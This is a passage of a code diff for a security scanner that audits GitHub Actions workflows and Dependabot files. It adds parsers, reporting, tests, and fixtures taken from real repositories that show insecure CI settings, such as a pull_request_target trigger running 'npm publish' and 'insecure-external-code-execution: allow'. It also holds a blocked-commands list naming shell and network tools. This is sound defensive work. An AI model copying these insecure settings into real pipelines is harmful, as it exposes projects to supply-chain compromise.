Object.entries(jobsRecord) + .map(([id, value]) => extractJobFacts(id, value)) + .filter((job): job is WorkflowJobFacts => job !== null) + : []; + + if (triggers.length === 0 && jobs.length === 0) { + return null; + } + + return { + triggers, + workflowPermissions: root.permissions, + jobs, + }; +} diff --git a/src/layer2-static/workflow/types.ts b/src/layer2-static/workflow/types.ts new file mode 100644 index 0000000..4570621 --- /dev/null +++ b/src/layer2-static/workflow/types.ts @@ -0,0 +1,17 @@ +export interface WorkflowStepFacts { + uses?: string; + run?: string; + with?: Record; +} + +export interface WorkflowJobFacts { + id: string; + permissions?: unknown; + steps: WorkflowStepFacts[]; +} + +export interface WorkflowFacts { + triggers: string[]; + workflowPermissions?: unknown; + jobs: WorkflowJobFacts[]; +} diff --git a/src/pipeline.ts b/src/pipeline.ts index 76c0162..d7b12e0 100644 --- a/src/pipeline.ts +++ b/src/pipeline.ts @@ -74,14 +74,16 @@ interface Layer3ToolEntry { type ToolClassificationMap = Record; -export function runStaticPipeline(input: StaticPipelineInput): CodeGateReport { - const findings = runStaticEngine({ - projectRoot: input.projectRoot, - files: input.files, - symlinkEscapes: input.symlinkEscapes, - hooks: input.hooks, - config: input.config, - }).map(withFindingFingerprint); +export async function runStaticPipeline(input: StaticPipelineInput): Promise { + const findings = ( + await runStaticEngine({ + projectRoot: input.projectRoot, + files: input.files, + symlinkEscapes: input.symlinkEscapes, + hooks: input.hooks, + config: input.config, + }) + ).map(withFindingFingerprint); const report = createEmptyReport({ version: input.version, diff --git a/src/reporter/sarif.ts b/src/reporter/sarif.ts index dee724d..1c00c42 100644 --- a/src/reporter/sarif.ts +++ b/src/reporter/sarif.ts @@ -33,6 +33,7 @@ interface SarifResult { level: "error" | "warning" | "note"; message: { text: string }; locations: SarifLocation[]; + relatedLocations?: 
SarifLocation[]; properties: Record; } @@ -64,25 +65,54 @@ function toSarifLevel(severity: Finding["severity"]): SarifResult["level"] { } function findingToLocation(finding: Finding): SarifLocation { + return locationToSarif({ + filePath: finding.file_path, + location: finding.location, + }); +} + +function locationToSarif(input: { + filePath: string; + location?: { + line?: number; + column?: number; + }; +}): SarifLocation { const region: SarifRegion = {}; - if (typeof finding.location.line === "number") { - region.startLine = finding.location.line; + if (typeof input.location?.line === "number") { + region.startLine = input.location.line; } - if (typeof finding.location.column === "number") { - region.startColumn = finding.location.column; + if (typeof input.location?.column === "number") { + region.startColumn = input.location.column; } return { physicalLocation: { artifactLocation: { - uri: finding.file_path, + uri: input.filePath, }, region: Object.keys(region).length > 0 ? region : undefined, }, }; } +function findingToRelatedLocations(finding: Finding): SarifLocation[] | undefined { + const related = finding.affected_locations ?? []; + if (related.length === 0) { + return undefined; + } + + const locations = related.map((location) => + locationToSarif({ + filePath: location.file_path, + location: location.location, + }), + ); + + return locations.length > 0 ? locations : undefined; +} + function buildRules(findings: Finding[]): SarifRule[] { const byRuleId = new Map(); @@ -109,6 +139,7 @@ function findingToResult(finding: Finding): SarifResult { level: toSarifLevel(finding.severity), message: { text: finding.description }, locations: [findingToLocation(finding)], + relatedLocations: findingToRelatedLocations(finding), properties: { finding_id: finding.finding_id, fingerprint: finding.fingerprint ?? 
null, diff --git a/src/reporter/terminal.ts b/src/reporter/terminal.ts index dc61d6a..67341b4 100644 --- a/src/reporter/terminal.ts +++ b/src/reporter/terminal.ts @@ -116,6 +116,18 @@ function appendFinding( if (formattedLocation) { lines.push(` Location: ${formattedLocation}`); } + if ((finding.affected_locations?.length ?? 0) > 0) { + lines.push(" Affected locations:"); + for (const location of finding.affected_locations ?? []) { + const path = toAbsoluteDisplayPath(report.scan_target, location.file_path); + const locationText = formatLocation({ + field: location.location?.field, + line: location.location?.line, + column: location.location?.column, + }); + lines.push(` - ${path}${locationText ? ` (${locationText})` : ""}`); + } + } if (finding.cve) { lines.push(` CVE: ${finding.cve}`); } diff --git a/src/scan.ts b/src/scan.ts index 58139de..2ef1e15 100644 --- a/src/scan.ts +++ b/src/scan.ts @@ -1,6 +1,6 @@ import { existsSync, readdirSync, readFileSync, statSync } from "node:fs"; import { homedir } from "node:os"; -import { join, relative, resolve, sep } from "node:path"; +import { basename, join, relative, resolve, sep } from "node:path"; import { collectLocalTextAnalysisTargets, type LocalTextAnalysisTarget, @@ -25,10 +25,15 @@ import { loadScanState, saveScanState, } from "./layer2-static/state/scan-state.js"; +import { + applyInlineIgnoreDirectives, + collectInlineIgnoreDirectives, +} from "./config/inline-ignore.js"; +import { isGitHubDependabotPath } from "./layer2-static/dependabot/parser.js"; import type { DiscoveryFormat } from "./types/discovery.js"; import type { Finding } from "./types/finding.js"; import type { CodeGateReport } from "./types/report.js"; -import type { CodeGateConfig } from "./config.js"; +import type { CodeGateConfig, ScanCollectionKind, ScanCollectionMode } from "./config.js"; import type { DeepScanResource } from "./pipeline.js"; interface CandidatePattern { @@ -56,11 +61,15 @@ export interface ScanEngineInput { export interface 
DeepScanDiscoveryOptions { includeUserScope?: boolean; homeDir?: string; + collectModes?: ScanCollectionMode[]; + collectKinds?: ScanCollectionKind[]; } export interface ScanSurfaceOptions { includeUserScope?: boolean; homeDir?: string; + collectModes?: ScanCollectionMode[]; + collectKinds?: ScanCollectionKind[]; } export interface ScanDiscoveryCandidate { @@ -88,6 +97,8 @@ export interface ScanDiscoveryContextOptions { homeDir?: string; parseSelected?: boolean; explicitCandidates?: ScanDiscoveryCandidate[]; + collectModes?: ScanCollectionMode[]; + collectKinds?: ScanCollectionKind[]; } const INFERRED_ARTIFACT_RULES: Array<{ @@ -95,6 +106,21 @@ const INFERRED_ARTIFACT_RULES: Array<{ format: DiscoveryFormat; tool: string; }> = [ + { + pattern: /(?:^|\/)\.github\/workflows\/[^/]+\.ya?ml$/iu, + format: "yaml", + tool: "github-actions", + }, + { + pattern: /(?:^|\/)\.github\/dependabot\.ya?ml$/iu, + format: "yaml", + tool: "dependabot", + }, + { + pattern: /(?:^|\/)action\.ya?ml$/iu, + format: "yaml", + tool: "github-actions", + }, { pattern: /(?:^|\/)agents\.md$/iu, format: "markdown", tool: "claude-code" }, { pattern: /(?:^|\/)claude\.md$/iu, format: "markdown", tool: "claude-code" }, { pattern: /(?:^|\/)codex\.md$/iu, format: "markdown", tool: "codex-cli" }, @@ -122,6 +148,16 @@ function normalizePathForMatch(path: string): string { return path.split(sep).join("/"); } +function normalizeCollectionKinds( + input: ScanCollectionKind[] | undefined, +): Set | undefined { + if (!input || input.length === 0) { + return undefined; + } + + return new Set(input); +} + function normalizeUserScopePattern(pattern: string): string { return normalizePathForMatch(pattern).replace(/^~\//u, "").replace(/^\/+/u, ""); } @@ -153,6 +189,40 @@ function gatherCandidatePatterns(kb: KnowledgeBaseLoadResult): CandidatePattern[ return candidates; } +function isWorkflowCollectionCandidate(reportPath: string): boolean { + return 
/(?:^|\/)\.github\/workflows\/[^/]+\.ya?ml$/iu.test(normalizePathForMatch(reportPath)); +} + +function isActionCollectionCandidate(reportPath: string): boolean { + const fileName = basename(normalizePathForMatch(reportPath)).toLowerCase(); + return fileName === "action.yml" || fileName === "action.yaml"; +} + +function inferCollectionKind(reportPath: string): ScanCollectionKind | null { + if (isWorkflowCollectionCandidate(reportPath)) { + return "workflows"; + } + if (isActionCollectionCandidate(reportPath)) { + return "actions"; + } + if (isGitHubDependabotPath(reportPath)) { + return "dependabot"; + } + return null; +} + +function matchesCollectionKinds( + reportPath: string, + collectKinds: Set | undefined, +): boolean { + if (!collectKinds) { + return true; + } + + const kind = inferCollectionKind(reportPath); + return kind !== null && collectKinds.has(kind); +} + function isRegularFile(path: string): boolean { try { return statSync(path).isFile(); @@ -261,9 +331,21 @@ function collectSelectedCandidates( absoluteTarget: string, walkedFiles: string[], patterns: CandidatePattern[], - options: { includeUserScope: boolean; homeDir: string }, + options: { + includeUserScope: boolean; + homeDir: string; + collectModes: Set; + collectKinds?: Set; + }, ): ScanDiscoveryCandidate[] { const selected = new Map(); + const includeAll = options.collectModes.has("all"); + const includeProject = + includeAll || options.collectModes.has("default") || options.collectModes.has("project"); + const includeUser = + includeAll || + options.collectModes.has("user") || + (options.collectModes.has("default") && options.includeUserScope); const filesByRelativePath = walkedFiles .map((filePath) => ({ @@ -273,6 +355,9 @@ function collectSelectedCandidates( .filter((entry) => !entry.relativePath.startsWith("..")); for (const file of filesByRelativePath) { + if (!includeProject) { + continue; + } for (const candidate of patterns) { if (candidate.scope !== "project") { continue; @@ -280,6 
+365,9 @@ function collectSelectedCandidates( if (!wildcardToRegex(candidate.pattern).test(file.relativePath)) { continue; } + if (!matchesCollectionKinds(file.relativePath, options.collectKinds)) { + continue; + } if (!selected.has(file.relativePath)) { selected.set(file.relativePath, { reportPath: file.relativePath, @@ -291,8 +379,14 @@ function collectSelectedCandidates( } } - if (!options.includeUserScope) { + if (!includeUser) { for (const file of filesByRelativePath) { + if (!includeProject) { + continue; + } + if (!matchesCollectionKinds(file.relativePath, options.collectKinds)) { + continue; + } if (selected.has(file.relativePath)) { continue; } @@ -308,41 +402,55 @@ function collectSelectedCandidates( return Array.from(selected.values()); } - for (const candidate of patterns) { - if (candidate.scope !== "user") { - continue; - } - const userPattern = normalizeUserScopePattern(candidate.pattern); - if (userPattern.includes("*")) { - for (const match of collectUserScopeWildcardMatches(options.homeDir, userPattern)) { - const reportPath = toUserReportPath(match.relativePath); - if (!selected.has(reportPath)) { - selected.set(reportPath, { - reportPath, - absolutePath: match.absolutePath, - format: candidate.format, - tool: candidate.tool, - }); + if (includeUser) { + for (const candidate of patterns) { + if (candidate.scope !== "user") { + continue; + } + const userPattern = normalizeUserScopePattern(candidate.pattern); + if (userPattern.includes("*")) { + for (const match of collectUserScopeWildcardMatches(options.homeDir, userPattern)) { + const reportPath = toUserReportPath(match.relativePath); + if (!matchesCollectionKinds(reportPath, options.collectKinds)) { + continue; + } + if (!selected.has(reportPath)) { + selected.set(reportPath, { + reportPath, + absolutePath: match.absolutePath, + format: candidate.format, + tool: candidate.tool, + }); + } } + continue; + } + const absolutePath = resolve(options.homeDir, userPattern); + if 
(!existsSync(absolutePath) || !isRegularFile(absolutePath)) { + continue; + } + const reportPath = toUserReportPath(userPattern); + if (!matchesCollectionKinds(reportPath, options.collectKinds)) { + continue; + } + if (!selected.has(reportPath)) { + selected.set(reportPath, { + reportPath, + absolutePath, + format: candidate.format, + tool: candidate.tool, + }); } - continue; - } - const absolutePath = resolve(options.homeDir, userPattern); - if (!existsSync(absolutePath) || !isRegularFile(absolutePath)) { - continue; - } - const reportPath = toUserReportPath(userPattern); - if (!selected.has(reportPath)) { - selected.set(reportPath, { - reportPath, - absolutePath, - format: candidate.format, - tool: candidate.tool, - }); } } for (const file of filesByRelativePath) { + if (!includeProject && !includeAll) { + continue; + } + if (!matchesCollectionKinds(file.relativePath, options.collectKinds)) { + continue; + } if (selected.has(file.relativePath)) { continue; } @@ -358,9 +466,23 @@ function collectSelectedCandidates( return Array.from(selected.values()); } +function normalizeCollectionModes( + input: ScanCollectionMode[] | undefined, +): Set { + const normalized = new Set(); + for (const mode of input ?? 
[]) { + normalized.add(mode); + } + if (normalized.size === 0) { + normalized.add("default"); + } + return normalized; +} + function mergeExplicitCandidates( selected: ScanDiscoveryCandidate[], explicitCandidates: ScanDiscoveryCandidate[] | undefined, + collectKinds?: Set, ): ScanDiscoveryCandidate[] { if (!explicitCandidates || explicitCandidates.length === 0) { return selected; @@ -371,6 +493,9 @@ function mergeExplicitCandidates( merged.set(candidate.reportPath, candidate); } for (const candidate of explicitCandidates) { + if (!matchesCollectionKinds(candidate.reportPath, collectKinds)) { + continue; + } merged.set(candidate.reportPath, candidate); } return Array.from(merged.values()); @@ -415,11 +540,16 @@ function ensureParsedCandidates(context: ScanDiscoveryContext): ParsedScanDiscov return context.parsedCandidates; } -function makeParseErrorFinding(filePath: string, tool: string, message: string): Finding { +function makeParseErrorFinding( + filePath: string, + tool: string, + message: string, + strictCollection: boolean, +): Finding { return { rule_id: "parse-error", finding_id: `PARSE_ERROR-${filePath}`, - severity: "LOW", + severity: strictCollection ? "HIGH" : "LOW", category: "PARSE_ERROR", layer: "L1", file_path: filePath, @@ -633,6 +763,8 @@ export function discoverDeepScanResources( const context = createScanDiscoveryContext(scanTarget, kbInput, { includeUserScope: options.includeUserScope, homeDir: options.homeDir, + collectModes: options.collectModes, + collectKinds: options.collectKinds, parseSelected: true, }); return discoverDeepScanResourcesFromContext(context); @@ -652,12 +784,20 @@ export function createScanDiscoveryContext( const kb = kbInput ?? 
loadKnowledgeBase(); const patterns = gatherCandidatePatterns(kb); const walked = walkProjectTree(absoluteTarget); + const collectModes = normalizeCollectionModes(options.collectModes); + const collectKinds = normalizeCollectionKinds(options.collectKinds); + const explicitOnly = collectModes.size === 1 && collectModes.has("explicit"); const selected = mergeExplicitCandidates( - collectSelectedCandidates(absoluteTarget, walked.files, patterns, { - includeUserScope: options.includeUserScope === true, - homeDir: resolve(options.homeDir ?? homedir()), - }), + explicitOnly + ? [] + : collectSelectedCandidates(absoluteTarget, walked.files, patterns, { + includeUserScope: options.includeUserScope === true, + homeDir: resolve(options.homeDir ?? homedir()), + collectModes, + collectKinds, + }), options.explicitCandidates, + collectKinds, ); return { @@ -691,6 +831,8 @@ export function collectScanSurface( const context = createScanDiscoveryContext(scanTarget, kbInput, { includeUserScope: options.includeUserScope === true, homeDir: options.homeDir, + collectModes: options.collectModes, + collectKinds: options.collectKinds, }); const surface = new Set(context.walked.files); @@ -719,6 +861,8 @@ export async function runScanEngine(input: ScanEngineInput): Promise ({ + filePath: file.filePath, + textContent: file.textContent, + })), + ); + const findings = applyInlineIgnoreDirectives( + [...report.findings, ...parseErrors, ...stateResult.findings], + inlineIgnores, + ); return applyReportSummary({ ...report, findings, diff --git a/src/types/finding.ts b/src/types/finding.ts index d5024c1..9ef0955 100644 --- a/src/types/finding.ts +++ b/src/types/finding.ts @@ -14,6 +14,11 @@ export const FINDING_CATEGORIES = [ "CONFIG_CHANGE", "NEW_SERVER", "TOXIC_FLOW", + "CI_SUPPLY_CHAIN", + "CI_TRIGGER", + "CI_PERMISSIONS", + "CI_TEMPLATE_INJECTION", + "CI_VULNERABLE_ACTION", ] as const; export type FindingCategory = (typeof FINDING_CATEGORIES)[number]; diff --git 
a/test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml b/test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml new file mode 100644 index 0000000..991ba4b --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml @@ -0,0 +1,11 @@ +# Source: https://github.com/Significant-Gravitas/AutoGPT/blob/0f67e45d05c855077236f739ca3a02fa95fc7e96/.github/workflows/claude-dependabot.yml +name: claude-dependabot +on: pull_request_target + +jobs: + claude-review: + runs-on: ubuntu-latest + if: github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + - run: npm publish diff --git a/test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml b/test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml new file mode 100644 index 0000000..47da422 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml @@ -0,0 +1,12 @@ +# Source: https://github.com/electron/electron/blob/6df6ec5f094f1546b5510c47aa478b2e19187f88/.github/workflows/pipeline-electron-lint.yml +name: lint +on: [pull_request] + +jobs: + lint: + runs-on: ubuntu-latest + steps: + - run: | + chromium_revision="$(grep -A1 chromium_version src/electron/DEPS | tr -d '\n' | cut -d\' -f4)" + gn_version="$(curl -sL -b ~/.gitcookies \"https://chromium.googlesource.com/chromium/src/+/${chromium_revision}/DEPS?format=TEXT\" | base64 -d | grep gn_version | head -n1 | cut -d\' -f4)" + echo "$gn_version" diff --git a/test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml b/test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml new file mode 100644 index 0000000..376f5ae --- /dev/null +++ 
b/test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml @@ -0,0 +1,10 @@ +# Source: https://github.com/electricitymaps/electricitymaps-contrib/blob/7d22bea77bd73a9bcc8c7e6fe78a973713ba8637/.github/workflows/label.yml +name: Label PR +on: [pull_request_target] + +jobs: + label: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - run: echo "label" diff --git a/test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml b/test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml new file mode 100644 index 0000000..3e1e4da --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml @@ -0,0 +1,8 @@ +# Source: https://github.com/RoleModel/rolemodel_rails/blob/83f8c13518afd1137405b81fc4723e202f833368/lib/generators/rolemodel/github/templates/dependabot.yml +version: 2 +updates: + - package-ecosystem: bundler + directory: "/" + insecure-external-code-execution: allow + schedule: + interval: weekly diff --git a/test-fixtures/workflow-audits/real-cases/index.json b/test-fixtures/workflow-audits/real-cases/index.json new file mode 100644 index 0000000..2db2c98 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/index.json @@ -0,0 +1,26 @@ +[ + { + "id": "RC-01-bot-conditions", + "target": "RC-01-bot-conditions", + "expected_rule": "bot-conditions", + "source": "https://github.com/Significant-Gravitas/AutoGPT/blob/0f67e45d05c855077236f739ca3a02fa95fc7e96/.github/workflows/claude-dependabot.yml" + }, + { + "id": "RC-02-obfuscation", + "target": "RC-02-obfuscation", + "expected_rule": "workflow-obfuscation", + "source": "https://github.com/electron/electron/blob/6df6ec5f094f1546b5510c47aa478b2e19187f88/.github/workflows/pipeline-electron-lint.yml" + }, + { + "id": "RC-03-concurrency-limits", + "target": "RC-03-concurrency-limits", + "expected_rule": "workflow-concurrency-limits", + "source": 
"https://github.com/electricitymaps/electricitymaps-contrib/blob/7d22bea77bd73a9bcc8c7e6fe78a973713ba8637/.github/workflows/label.yml" + }, + { + "id": "RC-04-dependabot-execution", + "target": "RC-04-dependabot-execution", + "expected_rule": "dependabot-execution", + "source": "https://github.com/RoleModel/rolemodel_rails/blob/83f8c13518afd1137405b81fc4723e202f833368/lib/generators/rolemodel/github/templates/dependabot.yml" + } +] diff --git a/tests/cli/help-examples.test.ts b/tests/cli/help-examples.test.ts index fed0480..3b9cea1 100644 --- a/tests/cli/help-examples.test.ts +++ b/tests/cli/help-examples.test.ts @@ -44,6 +44,13 @@ describe("cli help examples", () => { expect(help).toContain("codegate scan ."); expect(help).toContain("codegate scan ./skills/security-review/SKILL.md"); expect(help).toContain("codegate scan https://github.com/owner/repo"); + expect(help).toContain("--workflow-audits"); + expect(help).toContain("--collect "); + expect(help).toContain("--persona "); + expect(help).toContain("--runtime-mode "); + expect(help).toContain( + "codegate scan . 
--workflow-audits --collect project --persona auditor --runtime-mode online", + ); expect(help).toContain( "codegate scan https://github.com/owner/repo/blob/main/skills/security-review/SKILL.md", ); diff --git a/tests/cli/scan-command.test.ts b/tests/cli/scan-command.test.ts index 4ede0e3..e33f809 100644 --- a/tests/cli/scan-command.test.ts +++ b/tests/cli/scan-command.test.ts @@ -72,6 +72,11 @@ function buildDeps(overrides: Partial): CliDeps { check_ide_settings: true, owasp_mapping: true, trusted_api_domains: [], + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, suppress_findings: [], }), runScan: async () => makeReport([]), @@ -232,4 +237,63 @@ describe("task 16 scan command", () => { await runScanCommand(deps, ["."]); expect(receivedConfig?.scan_user_scope).toBe(true); }); + + it("passes collection and strict flags into effective scan config", async () => { + let receivedConfig: + | { + strict_collection?: boolean; + scan_collection_modes?: string[]; + } + | undefined; + + const deps = buildDeps({ + resolveConfig: () => ({ + ...DEFAULT_CONFIG, + }), + runScan: async (input) => { + receivedConfig = input.config; + return makeReport([]); + }, + }); + + await runScanCommand(deps, [ + ".", + "--collect", + "project", + "--collect", + "explicit", + "--strict-collection", + ]); + + expect(receivedConfig?.strict_collection).toBe(true); + expect(receivedConfig?.scan_collection_modes).toEqual(["project", "explicit"]); + }); + + it("passes collection kind filters into effective scan config", async () => { + let receivedConfig: + | { + scan_collection_kinds?: string[]; + } + | undefined; + + const deps = buildDeps({ + resolveConfig: () => ({ + ...DEFAULT_CONFIG, + }), + runScan: async (input) => { + receivedConfig = input.config; + return makeReport([]); + }, + }); + + await runScanCommand(deps, [ + ".", + "--collect-kind", + "workflows", + "--collect-kind", + 
"dependabot", + ]); + + expect(receivedConfig?.scan_collection_kinds).toEqual(["workflows", "dependabot"]); + }); }); diff --git a/tests/cli/workflow-audit-command.test.ts b/tests/cli/workflow-audit-command.test.ts new file mode 100644 index 0000000..b22e2ce --- /dev/null +++ b/tests/cli/workflow-audit-command.test.ts @@ -0,0 +1,90 @@ +import { describe, expect, it } from "vitest"; +import { createCli, type CliDeps } from "../../src/cli"; +import type { CodeGateReport } from "../../src/types/report"; + +const EMPTY_REPORT: CodeGateReport = { + version: "0.1.0", + scan_target: ".", + timestamp: "2026-03-23T00:00:00.000Z", + kb_version: "2026-03-23", + tools_detected: ["github-actions"], + findings: [], + summary: { + total: 0, + by_severity: { CRITICAL: 0, HIGH: 0, MEDIUM: 0, LOW: 0, INFO: 0 }, + fixable: 0, + suppressed: 0, + exit_code: 0, + }, +}; + +function buildDeps(overrides: Partial = {}): CliDeps { + return { + cwd: () => process.cwd(), + isTTY: () => false, + resolveConfig: () => ({ + severity_threshold: "high", + auto_proceed_below_threshold: true, + output_format: "terminal", + scan_user_scope: false, + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, + tui: { enabled: false, colour_scheme: "default", compact_mode: false }, + tool_discovery: { preferred_agent: "claude", agent_paths: {}, skip_tools: [] }, + trusted_directories: [], + blocked_commands: ["bash", "sh"], + known_safe_mcp_servers: [], + known_safe_formatters: [], + known_safe_lsp_servers: [], + known_safe_hooks: [], + unicode_analysis: true, + check_ide_settings: true, + owasp_mapping: true, + trusted_api_domains: [], + suppress_findings: [], + suppression_rules: [], + }), + runScan: async () => EMPTY_REPORT, + stdout: () => {}, + stderr: () => {}, + writeFile: () => {}, + setExitCode: () => {}, + ...overrides, + }; +} + +describe("workflow audit cli options", () => { + it("forwards workflow 
audit scan options into config", async () => { + let captured: CliDeps extends { runScan: (input: infer T) => Promise } ? T : never; + + const deps = buildDeps({ + runScan: async (input) => { + captured = input as typeof captured; + return EMPTY_REPORT; + }, + }); + + const cli = createCli("0.1.0", deps); + await cli.parseAsync([ + "node", + "codegate", + "scan", + ".", + "--workflow-audits", + "--collect", + "project", + "--persona", + "auditor", + "--runtime-mode", + "online", + ]); + + expect(captured?.config.workflow_audits?.enabled).toBe(true); + expect(captured?.config.scan_collection_modes).toEqual(["project"]); + expect(captured?.config.persona).toBe("auditor"); + expect(captured?.config.runtime_mode).toBe("online"); + }); +}); diff --git a/tests/config/config-precedence.test.ts b/tests/config/config-precedence.test.ts index d43ca8f..d6003b2 100644 --- a/tests/config/config-precedence.test.ts +++ b/tests/config/config-precedence.test.ts @@ -47,6 +47,24 @@ describe("task 16 config precedence", () => { trusted_api_domains: ["proxy.example.com"], trusted_directories: ["/safe/from-global"], scan_user_scope: false, + strict_collection: true, + scan_collection_modes: ["project"], + persona: "pedantic", + runtime_mode: "online", + workflow_audits: { enabled: true }, + rules: { + "workflow-unpinned-uses": { + disable: true, + ignore: ["global.yml", ".github/workflows/legacy.yml:12:3"], + config: { + shared: "global", + globalOnly: true, + }, + }, + "workflow-dangerous-triggers": { + ignore: ["global-triggers.yml:4"], + }, + }, }, null, 2, @@ -68,6 +86,27 @@ describe("task 16 config precedence", () => { trusted_api_domains: ["project.internal"], trusted_directories: ["/unsafe/project-attempt"], scan_user_scope: true, + strict_collection: false, + scan_collection_modes: ["user", "explicit"], + persona: "auditor", + runtime_mode: "offline", + workflow_audits: { enabled: false }, + rules: { + "workflow-unpinned-uses": { + disable: false, + ignore: 
[".github/workflows/project.yml:2:9"], + config: { + shared: "project", + projectOnly: true, + }, + }, + "workflow-template-injection": { + disable: true, + config: { + projectOnly: true, + }, + }, + }, }, null, 2, @@ -97,6 +136,28 @@ describe("task 16 config precedence", () => { ); expect(effective.trusted_directories).toEqual(["/safe/from-global"]); expect(effective.scan_user_scope).toBe(true); + expect(effective.strict_collection).toBe(false); + expect(effective.scan_collection_modes).toEqual(["user", "explicit"]); + expect(effective.persona).toBe("auditor"); + expect(effective.runtime_mode).toBe("offline"); + expect(effective.workflow_audits?.enabled).toBe(false); + expect(effective.rules?.["workflow-unpinned-uses"]?.disable).toBe(false); + expect(effective.rules?.["workflow-unpinned-uses"]?.ignore).toEqual( + expect.arrayContaining([ + "global.yml", + ".github/workflows/legacy.yml:12:3", + ".github/workflows/project.yml:2:9", + ]), + ); + expect(effective.rules?.["workflow-unpinned-uses"]?.config).toMatchObject({ + shared: "project", + globalOnly: true, + projectOnly: true, + }); + expect(effective.rules?.["workflow-dangerous-triggers"]?.ignore).toEqual([ + "global-triggers.yml:4", + ]); + expect(effective.rules?.["workflow-template-injection"]?.disable).toBe(true); expect(effective.blocked_commands).toEqual( expect.arrayContaining(["bash", "curl", "python3", "echo"]), ); @@ -116,5 +177,11 @@ describe("task 16 config precedence", () => { }); expect(effective.scan_user_scope).toBe(true); + expect(effective.strict_collection).toBe(false); + expect(effective.scan_collection_modes).toEqual(["default"]); + expect(effective.persona).toBe("regular"); + expect(effective.runtime_mode).toBe("offline"); + expect(effective.workflow_audits?.enabled).toBe(false); + expect(effective.rules).toBeUndefined(); }); }); diff --git a/tests/config/inline-ignore.test.ts b/tests/config/inline-ignore.test.ts new file mode 100644 index 0000000..cab3873 --- /dev/null +++ 
b/tests/config/inline-ignore.test.ts @@ -0,0 +1,73 @@ +import { describe, expect, it } from "vitest"; +import { + applyInlineIgnoreDirectives, + collectInlineIgnoreDirectives, +} from "../../src/config/inline-ignore"; +import type { Finding } from "../../src/types/finding"; + +function makeFinding(overrides: Partial = {}): Finding { + return { + rule_id: "workflow-unpinned-uses", + finding_id: "WORKFLOW_UNPINNED_USES-.github/workflows/ci.yml-0-0", + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: ".github/workflows/ci.yml", + location: { field: "jobs.test.steps[0].uses", line: 2, column: 3 }, + description: "test", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [], + suppressed: false, + ...overrides, + }; +} + +describe("inline ignore directives", () => { + it("collects yaml and markdown ignore directives", () => { + const directives = collectInlineIgnoreDirectives([ + { + filePath: ".github/workflows/ci.yml", + textContent: "# codegate: ignore[workflow-unpinned-uses]", + }, + { + filePath: "skills/security-review/SKILL.md", + textContent: "", + }, + ]); + + expect(directives.get(".github/workflows/ci.yml")?.rules.has("workflow-unpinned-uses")).toBe( + true, + ); + expect( + directives.get("skills/security-review/SKILL.md")?.rules.has("rule-file-remote-shell"), + ).toBe(true); + }); + + it("suppresses findings when an inline ignore matches rule and file", () => { + const directives = collectInlineIgnoreDirectives([ + { + filePath: ".github/workflows/ci.yml", + textContent: "# codegate: ignore[workflow-unpinned-uses]", + }, + ]); + + const [suppressed, active] = applyInlineIgnoreDirectives( + [ + makeFinding(), + makeFinding({ + rule_id: "workflow-dangerous-triggers", + finding_id: "WORKFLOW_DANGEROUS_TRIGGERS-.github/workflows/ci.yml", + }), + ], + directives, + ); + + expect(suppressed?.suppressed).toBe(true); + 
expect(active?.suppressed).toBe(false); + }); +}); diff --git a/tests/config/suppression-policy.test.ts b/tests/config/suppression-policy.test.ts index e433fea..eb44e0e 100644 --- a/tests/config/suppression-policy.test.ts +++ b/tests/config/suppression-policy.test.ts @@ -72,4 +72,68 @@ describe("suppression policy", () => { expect(suppressed?.suppressed).toBe(true); expect(active?.suppressed).toBe(false); }); + + it("supports coordinate-based suppression matching", () => { + const [suppressed, active] = applySuppressionPolicy( + [ + makeFinding({ + location: { field: "env.OPENAI_BASE_URL", line: 42, column: 7 }, + }), + makeFinding({ + location: { field: "env.OPENAI_BASE_URL", line: 11, column: 3 }, + }), + ], + { + suppress_findings: [], + suppression_rules: [ + { + rule_id: "env-base-url-override", + location: "packages/app/.mcp.json:42:7", + }, + ], + }, + ); + + expect(suppressed?.suppressed).toBe(true); + expect(active?.suppressed).toBe(false); + }); + + it("suppresses findings when a rule is disabled or ignored by rule policy", () => { + const [disabled, ignored, active] = applySuppressionPolicy( + [ + makeFinding({ + rule_id: "workflow-dangerous-triggers", + finding_id: "WORKFLOW_DANGEROUS_TRIGGERS-.github/workflows/ci.yml", + file_path: ".github/workflows/ci.yml", + location: { field: "on", line: 4, column: 2 }, + }), + makeFinding({ + rule_id: "workflow-unpinned-uses", + finding_id: "WORKFLOW_UNPINNED_USES-.github/workflows/ci.yml-0-0", + file_path: ".github/workflows/ci.yml", + location: { field: "jobs.build.steps[0].uses", line: 12, column: 7 }, + }), + makeFinding({ + rule_id: "workflow-unpinned-uses", + finding_id: "WORKFLOW_UNPINNED_USES-.github/workflows/ci.yml-0-1", + file_path: ".github/workflows/ci.yml", + location: { field: "jobs.build.steps[1].uses", line: 18, column: 7 }, + }), + ], + { + suppress_findings: [], + suppression_rules: [], + rule_policies: { + "workflow-dangerous-triggers": { disable: true }, + "workflow-unpinned-uses": { + ignore: 
